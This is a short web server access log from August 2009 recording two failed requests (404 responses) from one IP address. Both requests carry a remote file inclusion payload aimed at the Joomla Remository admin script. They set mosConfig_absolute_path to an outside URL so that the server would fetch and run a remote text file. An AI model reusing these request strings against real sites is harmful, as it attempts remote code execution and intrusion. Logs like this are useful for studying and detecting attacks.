69.73.159.26 - - [16/Aug/2009:05:43:09 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:05:43:09 -0500] "GET /logs/access_log.1242691200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
